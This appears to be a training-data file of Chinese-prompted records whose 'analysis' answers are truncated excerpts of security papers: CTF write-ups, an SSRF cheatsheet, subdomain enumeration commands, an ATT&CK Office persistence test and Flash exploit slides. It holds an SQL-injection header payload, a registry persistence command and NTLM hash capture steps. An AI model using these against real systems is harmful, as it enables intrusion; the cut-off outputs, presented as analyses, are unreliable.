{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Subdomains Enumeration ## Summary * [Enumerate all subdomains](#enumerate-all-subdomains-only-if-the-scope-is-domainext) * Subbrute * KnockPy * GoogleDorks * EyeWitness * Sublist3r * Subfinder * Findomain * Aquatone (Ruby and Go versions) * AltDNS * MassDNS * Nmap * Dnsdumpster * Subdomain take over * tko-subs * HostileSubBruteForcer * SubOver ## Enumerate all subdomains (only if the scope is *.domain.ext) ### Using Subbrute ```bash git clone https://github.com/TheRook/subbrute python subbrute.py domain.example.com ``` ### Using KnockPy with Daniel Miesslers SecLists for subdomain \"/Discover/DNS\" ```bash git clone https://github.com/guelfoweb/knock git clone https://github.com/danielmiessler/SecLists.git knockpy domain.com -w subdomains-top1mil-110000.txt ``` Using EyeWitness and Nmap scans from the KnockPy and enumall scans ```bash git clone https://github.com/ChrisTruncer/EyeWitness.git ./setup/setup.sh ./EyeWitness.py -f filename -t optionaltimeout --open (Optional) ./EyeWitness -f urls.txt --web ./EyeWitness -x urls.xml -t 8 --headless ./EyeWitness -f rdp.txt --rdp ``` ### Using Google Dorks and Google Transparency Report You need to include subdomains ;) https://www.google.com/transparencyreport/https/ct/?hl=en-US#domain=[DOMAIN]g&incl_exp=true&incl_sub=true ```bash site:*.domain.com -www site:domain.com filetype:pdf site:domain.com inurl:'&' site:domain.com inurl:login,register,upload,logout,redirect,redir,goto,admin site:domain.com ext:php,asp,aspx,jsp,jspa,txt,swf site:*.*.domain.com ``` ### Using Sublist3r ```bash To enumerate subdomains of specific domain and show the results in realtime: python sublist3r.py -v -d example.com To enumerate subdomains and enable the bruteforce module: python sublist3r.py -b -d example.com To enumerate subdomains and use specific engines such Google, Yahoo and Virustotal engines python sublist3r.py -e google,yahoo,virustotal -d example.com python sublist3r.py -b -d example.com ``` ### Using Subfinder ```powershell go get gi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nGreetz from Room 101 Kenneth Geers www.chiefofstation.com DEFCON 15 Contents: A Cyber War in Three Parts PREFACE...............................................................................................................................................................................3 1984....................................................................................................................................................................................3 2007....................................................................................................................................................................................3 CHIEF OF STATION INTELLIGENCE REPORT .............................................................................................................4 PALACE STRATEGY.................................................................................................................................................................4 CYBER OFFICE TACTICS.......................................................................................................................................................4 NATIONAL SECURITY AND TRAFFIC ANALYSIS....................................................................................................................5 THE CORPORATE CONNECTION...............................................................................................................................................6 OUTLOOK ................................................................................................................................................................................6 EXODUS NON-GOVERNMENTAL ORGANIZATION SURVEY ..................................................................................8 THE MOST REPRESSIVE GOVERNMENTS IN CYBERSPACE......................................................................................................8 # 10 ZIMBABWE.......................................", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWhile other books have tackled the military-internet complex, tech-enabled intelligence gathering, and cyberwarfare, together with WikiLeaks, Edward Snowden, and the 2016 US election, there is a crucial element to the stories missing in all of them. In his revelatory new book, CULT OF THE DEAD COW: How the Original Hacking Supergroup Might Just Save the World, acclaimed journalist Joseph Menn profiles the people dedicated to information security who are out of the spotlight and in the shadows, fighting to protect our personal data and freedom as well as our national security. CULT OF THE DEAD COW is the story of the oldest surviving, most respected, and most famous hacking group of all time. Its members released tools that forced giant companies to work harder to protect consumers, and then they launched the broad movement known as hacktivism. Though it has never had more than twenty active members at a time, the Cult of the Dead Cow (cDc) has multiple claims on history. As it evolved from a pre-web community, cDc members developed hacking software that is still being used by criminals, spies, and professional network administrators. They released the top tool for testing password security and created what was for years the best technique for controlling computers from afar. They contributed to the development of Tor, the most important privacy tool on the net, and helped build cyberweapons that advanced US security without injuring anyone. The Cult of the Dead Cow defined hacktivism and tirelessly promoted the idea to the public and fellow hackers, leading the movement and urging programmers to wield their keyboards in service of human rights. As cDc matured, its members became leaders in changing hacking from a hobby to a profession to a mode of warfare. Though most Cult of the Dead Cow members have remained anonymous through the years, sixteen have agreed to be named for the first time in these pages, including all the previously cloaked core participants, many o", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 关于Tomcat中的三个Context的理解 Context ServletContext ApplicationContext StandardContext @yzddmr6 p在知识星球问了个问题Tomcat中这三个StandardContextApplicationContext ServletContext都是什么的 skay师傅给出了的理解https://mp.weixin.qq.com/s/BrbkTiCuX4lNEir3y24lew 这来讲讲我的理解说的不定对仅供参考 context是上下的意思在java中经常能看到这个东那么到底是什么意思呢 根据我的理解如果把某次请求作电影中的事件那么context就相当于事件发的背景例如部电影 中的某个镜头中张三喊奥利给但是只看这个镜头我们不知道到底发了什么张三是谁为什 么要喊奥利给所以就需要交代当时事情发的背景张三是吃饭前喊的奥利给还是吃饭后喊的奥利 给因为对于同件事情张三喊奥利给这件事发的背景不同意义可能是不同的吃饭前喊奥利给可 能是饿了的意思吃饭后喊奥利给可能是说吃饱了的意思在WEB请求中也如此在次request请求发 时背景也就是context会记录当时的情形当前WEB容器中有个filter有什么servlet有什么 listener请求的参数请求的路径有没有什么全局的参数等等 Context 2 ServletContext是Servlet规范中规定的ServletContext接般servlet都要实现这个接概就是 规定了如果要实现个WEB容器他的Context要有这些东获取路径获取参数获取当前的 filter获取当前的servlet等 ServletContext 1 package javax.servlet; 2 3 ... 4 5 public interface ServletContext { 6 String TEMPDIR = \"javax.servlet.context.tempdir\"; 7 String ORDERED_LIBS = \"javax.servlet.context.orderedLibs\"; 8 9 String getContextPath(); 10 11 ServletContext getContext(String var1); 12 13 ... 14 15 /** @deprecated */ 16 @Deprecated 17 Servlet getServlet(String var1) throws ServletException; 18 19 /** @deprecated */ 20 @Deprecated 21 Enumeration<Servlet> getServlets(); 22 23 /** @deprecated */ 24 @Deprecated 25 Enumeration<String> getServletNames(); 26 27 void log(String var1); 28 29 /** @deprecated */ 30 @Deprecated 31 void log(Exception var1, String var2); 32 3 33 void log(String var1, Throwable var2); 34 35 String getRealPath(String var1); 36 37 String getServerInfo(); 38 39 String getInitParameter(String var1); 40 41 Enumeration<String> getInitParameterNames(); 42 43 boolean setInitParameter(String var1, String var2); 44 45 Object getAttribute(String var1); 46 47 Enumeration<String> getAttributeNames(); 48 49 void setAttribute(String var1, Object var2); 50 51 void removeAttribute(String var1); 52 53 String getServletContextName(); 54 55 Dynamic addServlet(String var1, String var2); 56 57 Dynamic addServlet(String var1, Servlet var2); 58 59 Dynamic addServlet(String var1, ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDe1CTF WP Author:Nu1L Team De1CTF WP Misc Misc/Misc Chowder mc_join Web clac check in Hard_Pentest_1&2 Pwn stl_container code_runner BroadCastTest pppd Crypto ECDH NLFSR Homomorphic Re /little elves parser FLw Misc Misc/Misc Chowder , pnghttps://drive.google.com/file/d/1JBdPj7eRaXuLCTFGn7Al uAxmxQ4k1jvX/view docx, , You_found_me_Orz.zip, , You_found_me_Orz.jpg, rar, 7z666.jpg:fffffffflllll.txt mc_join import time import socket import threading import thread import struct def str2hex(data): res = '' for i in data: res += hex(ord(i)).replace('0x','') return res def log(strLog): strs = time.strftime(\"%Y-%m-%d %H:%M:%S\") print strs + \" -> \" + strLog def start_thread(thread_class): thread.start_new_thread(thread_class.run, ()) class pipethreadSend(threading.Thread): ''' classdocs ''' def __init__(self,source,sink,recv_thread=None): ''' Constructor ''' threading.Thread.__init__(self) self.source = source self.sink = sink self.recv_thread = recv_thread self.__is_runing = True log(\"New send Pipe create:%s->%s\" % (self.source.getpeername(),self.sink.getpeername())) def run(self): self.source.settimeout(60) while True: try: data = self.source.recv(4096) break except socket.timeout: continue except Exception as e: log(\"first Send message failed\") log(str(e)) self._end() return if data is None: log(\"first Send message none\") self._end() return data = data.replace('MC2020','20w14a').replace(':997',':710').replace('\\x00\\xca\\x0 5','\\x00\\xe5\\x07') # add verify here try: self.sink.send(data) except Exception: self._end() return self.source.settimeout(60) while self.__is_runing: try: try: data = self.source.recv(4096) except socket.timeout: continue if not data: break data = data.replace('MC2020','20w14a').replace(':997',':710').replace('\\x00\\xca\\x0 5','\\x00\\xe5\\x07') self.sink.send(data) except Exception ,ex: log(\"redirect error:\" + str(ex)) break self._end() def terminate(self): self.__is_runing = False def _end(self): self.recv_thread.terminate() try: self.source.close() self.sink.close", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nN1CTF2020 Writeup Author:Nu1L Team WEB signin GinDriver Design Information Gathering Webauthn Reverse Engineering Identity Forgery Arbitrary File Uploading Arbitrary File Reading Get Shell Easy_tp5 Expected solution Unexpected 1 Unexpected 2 Unexpected 3 Unexpected 4 It's half expected 5 Zabbix_fun Docker_manager The King Of Phish Victim Bot UserA-PC DC Pwn SignIn EasyWrite Babyrouter Unexcepted Excepted Escape Echoserver Kemu W2L Crypto VSS BabyProof Zero-knowledge proof HNP Code Curve Easy RSA? Factor N solve LWE code FlagBot Reverse Oflo Oh My Julia EasyAPK Fixed Camera N1vault EasyRE Auth BabyCompiler BabyOS Rrr Misc Filters Intended solution Case ABCDEFGHI Conclusion Unintended solution GinDriver Revenge N1egg N1egg In Fixed Camera WEB signin payload here GET /? input=O%3A4%3A%22flag%22%3A1%3A%7Bs%3A2%3A%22ip%22%3BO%3A2%3A%22ip%22%3A0%3A%7B% 7D%7D HTTP/1.1 Host: 101.32.205.189 Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,imag e/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate X-Forwarded-For: 123.123.123.13' or updatexml(1,concat(0x7e,(select if((select substr(version(),2,1)='.'),'n1ctf',1))),0) or ' Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Connection: close key is in database,but if u use select key from n1key ,u cannot find it.Why? GinDriver Design This challenge is designed into two separated part, as we can see in the platform are GinDriver and GinDriver Revenge . In fact, the original idea is inspired by plusls, that he found a trick that may leading to RCE by uploading a malicious dynamic-link library and .pam_environment file to bypass sshd mechanism (inspired by CVE-2015-8325 ). So, I designed the first part to make a springboard helping challengers finding a way leaping to the second part. ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSSRF bible. Cheatsheet If you have any questions, please post them in the comments! Revision 1.02 6 august 2014 Authors: @ONsec_Lab http://lab.onsec.ru [ENG] @Wallarm research team blog.wallarm.com 1 Table of contents Table of contents Basics Typical attack steps File Descriptors exploitation way URL schema support Protocols SSRF smuggling Smuggling examples Apache webserver HTTP parser Nginx webserver HTTP parser Vulnerabilities Basics Examples Google Docs ZeroNights hackquest challenge Exploitation tricks Bypassing restrictions Input validation Unsafe redirect DNS pinning PHP fsockopen() url parsing tricks Network restrictions Protocol fingerprinting Examples HTTP Memcached Retrieving data Examples HTTP response encapsulation into XML formatted response 2 Console cURL wildcards URL responses concatenation SMBRelay exploitation Original request data sniffing Examples Memcached Exploits PHPFPM Syslog Exploits Zabbix agentd Exploits Postgres Exploits MongoDB CouchDB Exploits FFmpeg References Tools Researches 3 Basics SSRF  Server Side Request Forgery attacks. The ability to create requests from the vulnerable server to intra/internet. Using a protocol supported by available URI schemas, you can communicate with services running on other protocols. Here we collect the various options and examples (exploits) of such interaction. See for introduction related researches. Typical attack steps 1. Scan internal network to determine internal infrastructure which you may access 2. Collect opened ports at localhost and other internal hosts which you want (basically by timebased determination) 3. Determine services/daemons on ports using wiki or daemons banners (if you may watch output) 4. Determine type of you SSRF combination:  Direct socket access (such as this example)  Sockets client (such as java URI, cURL, LWP, others) 5. In case of direct socket access determine CRLF and other injections for smuggling 6. In case of sockets client, determine available URI schemas 7. Com", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1137-002-win-office应用启动程序-office test ## 来自ATT&CK的描述 攻击者可能会滥用微软Office的 \"Office Test \"注册表键在被攻击的系统上获得持久性存在一个Office测试注册表位置允许用户指定一个任意的DLL在每次启动Office应用程序时执行这个注册表键被认为是微软在开发Office应用程序时用来加载DLLs以进行测试和调试的在Office安装过程中该注册表键并不是默认创建的 存在用于Office测试功能的用户和全局注册表键 ``` HKEY_CURRENT_USER\\Software\\Microsoft\\Office test\\Special\\Perf HKEY_LOCAL_MACHINE\\Software\\MicrosoftOffice test\\Special\\Perf ``` 攻击者可能会添加此注册表项并指定将在 Office 应用程序如 Word 或 Excel启动时执行的恶意 DLL ## 测试案例 ### 测试1 Office Application Startup Test Persistence 使用Windows 命令行执行攻击命令 ``` reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Office test\\Special\\Perf\" /t REG_SZ /d \"#{thing_to_execute}\" ``` thing_to_execute恶意dll位置 清理命令 ``` reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Office test\\Special\\Perf\" /f >nul 2>&1 ``` ## 检测日志 Windows 安全日志Sysmon日志 ## 测试复现 ### 测试1 Office Application Startup Test Persistence ``` C:\\Users\\Administrator.ZHULI>reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Office test\\Special\\Perf\" /t REG_SZ /d \"C:\\Users\\Administrator.ZHULI\\Desktop\\TevoraAutomatedRTGui\\atomic-red-team-master\\atomics\\T1137.002\\test.dll\" 操作成功完成 C:\\Users\\Administrator.ZHULI>reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Office test\\Special\\Perf\" /f >nul 2>&1 ``` ## 测试留痕 ### 测试1 Office Application Startup Test Persistence ``` Sysmon 事件ID 1 进程创建 Process Create: RuleName: technique_id=T1112,technique_name=Modify Registry UtcTime: 2022-01-11 06:27:59.157 ProcessGuid: {78c84c47-236f-61dd-cf20-000000000800} ProcessId: 3312 Image: C:\\Windows\\System32\\reg.exe FileVersion: 10.0.17763.1 (WinBuild.160101.0800) Description: Registry Console Tool Product: Microsoft Operating System Company: Microsoft Corporation OriginalFileName: reg.exe CommandLine: reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Office test\\Special\\Perf\" /t REG_SZ /d \"C:\\Users\\Administrator.ZHULI\\Desktop\\TevoraAutomatedRTGui\\atomic-red-team-master\\atomics\\T1137.002\\test.dll\" CurrentDirectory: C:\\Users\\Administrator.ZHULI\\ User: ZHULI\\Administrator LogonGuid: {78c84c47-f665-61db-95da-44010000", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nUnboxing Android Everything you wanted to know about Android packers Slava Makkaveev Avi Bashan Who Are We? @Avi R&D Team Leader at Check Point, former security researcher at Lacoon Mobile Security. Experienced in OS Internal research, mobile security, linux kernel. @Slava Senior Security Researcher at Check Point, former Security Researcher at Verint. Vast experience in mobile OS research and linux internals. Boxing Apps  Malware authors use various boxing techniques to prevent  Static Code Analysis  Reverse Engineering  This can be done by proprietary techniques or 3rd party software  This Includes  Code Obfuscation  Anti Debugging  Anti Tampering  Anti Dumper  Anti Decompiler  Anti Runtime Injection Maliciousness of Packed Apps Analyzed 13,000 Apps (July 2017) Techniques to protect an apps code  Obfuscators  Packers  Protectors Apk Protection Techniques  Obfuscators  Packers  Protectors Apk Protection Techniques pm.getClass().getMethod(\"getPackageSizeInfo\", String.class, Class.forName(\"android.content.pm.IPackageStatsObserver\")).invoke(pm, packInfo.packageName, new IPackageStatsObserver.Stub() { public void onGetStatsCompleted(PackageStats pStats, boolean succeeded) { } }); v6.getClass().getMethod(\"getPackageSizeInfo\", String.class, Class.forName(\"android.a.a.a\")).invoke(v6, ((PackageInfo)v0_5).packageName, new a() { public void a(PackageStats arg3, boolean arg4) { } });  Obfuscators  Packers  Protectors Apk Protection Techniques Original DEX  Obfuscators  Packers  Protectors Packer Loader Encrypted DEX APK APK Packing process Apk Protection Techniques Packer Loader Encrypted DEX  Obfuscators  Packers  Protectors Packer Loader Original DEX APK APK Execution Apk Protection Techniques  Obfuscators  Packers  Protectors Apk Protection Techniques  Obfuscators  Packers  Protectors Original DEX Encrypted Modified DEX APK APK Protection Process Protector Loader Apk Protection Techniques  Obfuscators  Packers  Protectors Encrypted Modified DEX Modified DEX APK APK Executi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFlash内存管理与漏洞利用 Hearmen 北京大学软件安全研究小组 目录 AVM2 虚拟机简介 CVE-2015-0313 CVE-2015-3043 CVE-2015-5119 攻击演示 uCVE-2015-3043 AVM2 虚拟机简介 uAVM2 是 目 前 使 用 的 flash player 的 核 心  所 有 的 ActionScript 3 代码都由AVM2来执行 u采用Jit与解释器混合执行的方式大幅提升flash的运 行效率 ActionScript 3执行流程 uavm2overview ActionScript 3 bytecode Constant pool 堆栈初始化 常量池初始化 JIT 解释器 机器语言 编译器 AVM 2 AVM2 内存管理 u使用MMgc进行内存管理 u延缓引用计数标记/清除算法 u从操作系统中申请大量保留空间按页交予垃圾回收机 制GC进行管理 AVM2 内存管理 HeapBlock 4k 4k 4k 4k 4k 4k 4k 4k 4k 4k 4k 4k 4k 4k 4k 4k 4k 4k 4k 4k HeapBlock HeapBlock HeapBlock HeapBlock GCHeap Free[0] Free[1] Free[2] Free[3] Free[4] Free[5]  Free[30] 1 block 1 block 1 block 1 block 2 block 2 block 2 block 2 block 3 block 3 block 3 block 3 block 4 block 4 block 4 block 4 block 5 block 5 block 5 block 5 block 6 block 6 block 6 block 6 block 128 block  block  block  block FreeLists CVE-2015-0313 ByteArray.Clear() 利用步骤 堆喷射控制内存布局 触发漏洞更改Vector的length属性 任意地址读写布局shellcode 更改对象虚表接管程序运行流程 ByteArray uByteArrayObject uBuffer uBuffer大小以4k倍数增长 u通过FixedMalloc进行内存分配 FixedMalloc FixedMalloc::Alloc(size) { if(size < kLargestAlloc) // 32bit 2032 FindAllocate(size)->FixedAlloc() else LargeAlloc(size) } FixedBlock FixedAlloc FixedAllo c FixedBlock FixedBlock FixedBlock FixedBlock Free item Free item m_firstFree firstFree m_firstBlock Uint Vector 内存布局 data data Data_1 data data data data Data_2 data data Worker data data FixedBlock data data Block Head Vector<uint> Vector<uint> Vector<uint> si32 Main FixedBlock 稳定性的考虑 uByteArray.clear之前的额外操作 ØGCHeap内存释放将HeapBlock挂入freelist末尾 ØGCHeap内存分配从freelist头部开始遍历 CVE-2015-3043 ØFlash在解析Flv中Nellymoser压缩的<tag>时没有对buffer长度 进行正确的检验从而导致的堆溢出 Ø被溢出的对象大小是0x2000 Ø该漏洞出现过 两次 内存布局 Vector<uint> Vector<uint> Free Vector<uint> Vector<uint> Vector<uint> Vector<uint> Corrupt Buffer Vector<uint> Vector<uint> Vector<uint> Vector<uint> Corrupt Obj Vector<uint> Vector<Obj> 加载flv 重新布局 Object Vector GC::Alloc GC::Alloc { if(size < kLargestAlloc) //1968 GCAlloc() else GCLargeAlooc::Alloc() } GCBlock GCAlloc GCAlloc GCBlock GCBlock GCBlock G", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nI am walking through a city made of glass and I have a bag full of rocks (Dispelling the myths and discussing the facts of Global Cyber-Warfare) Jayson E. Street, CISSP, GSEC, GCIH, GCFA, IEM, IAM, ETC Let go of my EGO  Lets start out with a little about yours truly.  Defcon17@F0rb1dd3n.com http://F0rb1dd3n.com Yes Sun Tzu was a hacker!  Sun Wu (Tzu) Ping-fa(The Art of War)  Thus it is said that one who knows the enemy and knows himself will not be endangered in a hundred engagements. One who does not know the enemy but knows himself will sometimes be victorious, sometimes meet with defeat. One who knows neither the enemy nor himself will invariably be defeated in every engagement! Contents  INTRO  Caveats  History & Geography lessons  Players and Haters  Youre involved? YES!!  Discussion I read it on the Internets  Report VS. Investigate Facets of Perspective VS. Meet your new neighbors (and they hate you) The Roster for the B1G Game  China  Russia  Jihadist  More players  USA (and friends) CHINA (The Terrell Owens of cyber-war)  Definition of Red Hacker Alliance:  A Chinese nationalist hacker network, made up of many independent web sites directly linked to one another in which individual sites educate their members on computer attack and intrusion techniques. The group is characterized by launching coordinated attacks against foreign governments and entities to protest actual and perceived injustices done to their nation. There is a growing trend that suggests monetary motivations are becoming as important as patriotic passion. They started without us  1997 Formation of the Green Army Founded by GoodWell (China)  1998 Anti-Chinese riots in Indonesia provide the catalyst for the creation of the Red Hacker Alliance.  2000 Honker Union of China founded by Lion China Eagle Union founded by Wan Tao Javaphile founded by Coolswallow and Blhuang  2001 Sino-US cyber conflict 1000 web defacement protesting death of Chinese pilot. 73% of all statistics are made up. (But sti", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Vegeta1 > https://download.vulnhub.com/vegeta/Vegeta.ova 靶场IP`192.168.32.24` 扫描对外端口服务 ``` (rootkali)-[/tmp] # nmap -sV -p1-65535 192.168.32.24 Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-14 05:27 EDT Nmap scan report for 192.168.32.24 Host is up (0.00013s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 80/tcp open http Apache httpd 2.4.38 ((Debian)) MAC Address: 08:00:27:8F:78:BF (Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.49 seconds ``` 访问80端口 ![image-20220914172852884](../../.gitbook/assets/image-20220914172852884.png) 爆破目录 ``` (rootkali)-[/tmp] # gobuster dir -u http://192.168.32.24 -w /usr/share/wordlists/rockyou.txt ``` 访问`/robots.txt` ``` (rootkali)-[/tmp] # curl http://192.168.32.24/robots.txt * /find_me ``` 访问`/fine_me` ![image-20220914173032746](../../.gitbook/assets/image-20220914173032746.png) 查看页面源代码发现 ``` <!-- aVZCT1J3MEtHZ29BQUFBTlNVaEVVZ0FBQU1nQUFBRElDQVlBQUFDdFdLNmVBQUFIaGtsRVFWUjRuTzJad1k0c09RZ0U1LzkvK3UyMU5TdTdCd3JTaVN0QzhoR2M0SXBMOTg4L0FGanljem9BZ0RNSUFyQUJRUUEySUFqQUJnUUIySUFnQUJzUUJHQURnZ0JzUUJDQURRZ0NzQUZCQURhRUJmbjUrUmwvbk9aTFAxeER6K3g5VTA1cWJoWjFkcjRzSFQyejkwMDVxYmxaMU5uNXNuVDB6TjQzNWFUbVpsRm41OHZTMFRONzM1U1RtcHRGblowdlMwZlA3SDFUVG1wdUZuVjJ2aXdkUGJQM1RUbXB1Vm5VMmZteWRQVE0zamZscE9hdVhKUVRUamxkSHZ0YmxvNDZOUWp5UjV4eUlvZ09CUGtqVGprUlJBZUMvQkdubkFpaUEwSCtpRk5PQk5HQklIL0VLU2VDNkVDUVArS1VFMEYwakJWRS9aSGM4SEhkUHZ1RWQwZVF3N003MWFtelRIaDNCRGs4dTFPZE9zdUVkMGVRdzdNNzFhbXpUSGgzQkRrOHUxT2RPc3VFZDBlUXc3TTcxYW16VEhoM0JEazh1MU9kT3N1RWQwZVFJcWJNNENUcmhKMGhTQkZUWmtDUUdBaFN4SlFaRUNRR2doUXhaUVlFaVlFZ1JVeVpBVUZpSUVnUlUyWkFrQmdJVXNTVUdSQWtCb0lVMFRHZjAxN2UrdTRJVXNScEtSRGtXYzVsdjNEQlN4ZjFqZE5TSU1pem5NdCs0WUtYTHVvYnA2VkFrR2M1bC8zQ0JTOWQxRGRPUzRFZ3ozSXUrNFVMWHJxb2I1eVdBa0dlNVZ6MkN4ZT", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n前 言 报告方法论 当前数字化转型已深入各行各业API这个曾经的底层代码接口不仅发展成为 产品本身更成为企业承载价值连接业务的核心载体一个由API使用者和开发者组成 的围绕API产品生命周期的价值交换新模式正日益成熟特别是与微服务DevOps等技 术的融合都将使得API战略成为企业加速创新的利器 该报告旨在通过全面的视角反映API生态的发展现状包括API使用者和开发者的主要 诉求策略行为展现API产品生命周期各阶段的实践过程工具使用情况并进一步探 讨API技术未来可能的发展方向价值实现方式力求为相关企业组织个人制定API战 略提供一个参考视角 该报告的观察和发现主要基于数据统计我们广泛采集了相关从业者的数千份调研问卷并从中优选了 5000余份具有高可信度的数据在此基础上结合主观经验进行数据的解读和剖析对数据产生的客观背景深 层次原因进行了适当延伸最终得到以下若干结论 目 录 主要结论 01 ---------------------------------------- API的发展和应用现状 06 -------------------------------- 关于结论的说明 02 ----------------------------------- API的使用者需求 12 ---------------------------------- API开发者的策略和行为画像 16 --------------------------- API设计流程和工具 22 -------------------------------- API测试流程和工具 26 -------------------------------- API文档的使用 32 ----------------------------------- API综合管理体系 37 ---------------------------------- 41 ---------------------------- API的技术挑战和发展趋势 统计人口样本 44 ------------------------------------ CONTENTS 主要结论 1当前我国API生态尚未成熟市场尚处早期发展阶段虽然API已广泛应用在以网 页移动应用后端系统集成为主的众多场景但因质量问题带来的API变更仍然是造成线 上事故的主因在所有受访者中API开发者呈现出人数比例偏低集中在开发/设计端 从业经验尚浅等特征 2使用者对API的主要诉求已由获取数据能力转变为获取技术能力甚至业务能力 使用者渴望高效便捷的寻找调用方式除关注API产品本身性能外也愈发关注优质的后 续服务和使用体验 3当前开发API的最主要目的是优化内部系统工具和团队协作其次是促进形成生 态开展外部合作较少被用于盈利目的API的开发行为同样需要广泛地借助各类工具 工具的易用性是其首要关注点 4API开发模式正走向规模化体系化半数开发者已经建立API设计流程开源编 辑器依然是其首选的设计工具设计方式逐渐由代码驱动转向文档驱动通过API设计文档 自动生成代码的能力愈发重要 5质量低下的API可能对用户的业务造成严重影响缺乏合适的工具和技术已经成为 保障API质量的最大障碍API开发者同样意识到了质量问题建立API测试流程已经成为 共识普遍使用多款测试工具YAPIPostman是目前的主流 6七成受访者已建立正规的API文档流程但大量的团队还没有意识到API文档应有 的重要作用也不具备自动化生成API文档的能力有相当比例的受访者选择使用自研的 API文档工具相关工具的匮乏似乎成为API文档管理的障碍 7开发者的API管理意识更强普遍选择API网关开放API以及通过API综合管理平 台实现API的全生命周期管理 8API技术依然面临全面的挑战受到最多关注的包括标准化可组合性/可重用性 和安全性且普遍认为微服务物联网DevOps等技术的发展可能对API最具促进作用 01 关于结论的说明 当前我国API生态尚未成熟市场尚处早期发展阶段虽然API已广泛应用在以网 页移动应用后端系统集成为主的众多场景但因质量问题带来的API变更仍然是造成线 上事故的主因在所有受访者中API开发者呈现出人数比例偏低集中在开发/设计端 从业经验尚浅等特征 约78%的受访者表示已经将API对外部开放其中供外部付费使用的仅占9%一定程 度上说明当前API应用行业的竞争还处于蓝海时代伴随企业的数字化微服务改造进程不 断深入API被广泛应用在网页移动应用后端系统集成等场景API经济正在帮助各行 各业的企业借助外部力量高效低成本快速地获取数据和技术能力新势力仍有广泛的市 场机遇 API经济中API质量问题仍是参与双方的主要困扰因质量问题带来的API变更", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 本地抓包 --- ## 开启记录功能 Windows 系统自带的 netsh 中的 trace 功能能够实现不安装任何第三方依赖库在命令行下进行抓包 ``` netsh trace start capture=yes persistent=yes traceFile=\"c:\\\\in.etl\" overwrite=yes correlation=no protocol=tcp ipv4.address=192.168.1.1 keywords=ut:authentication ``` - capture=yes 开启抓包功能 - persistent=yes 系统重启不关闭抓包功能只能通过Netsh trace stop关闭 - traceFile 指定保存记录文件的路径 - overwrite=yes 如果文件存在那么对其覆盖 - correlation=no 不收集关联事件 - protocol=tcp 抓取TPC协议 - ipv4.address=192.168.62.130 限定只抓和服务器IP相关的数据包 - keywords=ut:authentication 关键字为ut:authentication 记得 `ipv4.address=` 改成本机 IP 同级目录下会生成系统的配置文件压缩包后缀名为.cab ## 关闭记录功能 这里需要手动关闭 ``` netsh trace stop ``` ## 转换格式 关闭功能后系统会将捕获到的数据包保存为 etl 结尾的文件 etl 文件无法直接打开需要借助工具 windows message analyzer 将其转换成. cap 格式 (Wireshark 能够识别) 目前 windows message analyzer 已经不在更新,微软官网也取消了下载链接,并推荐使用 https://github.com/microsoft/etl2pcapng 来代替 ``` etl2pcapng.exe in.etl out.pcapng ``` --- ## Source & Reference - [渗透技巧利用netsh抓取连接文件服务器的NTLMv2 Hash](https://xz.aliyun.com/t/1945) - [监听445端口抓v2数据](https://xz.aliyun.com/t/8543)", "category": "text_analysis", "source": "security_papers"}
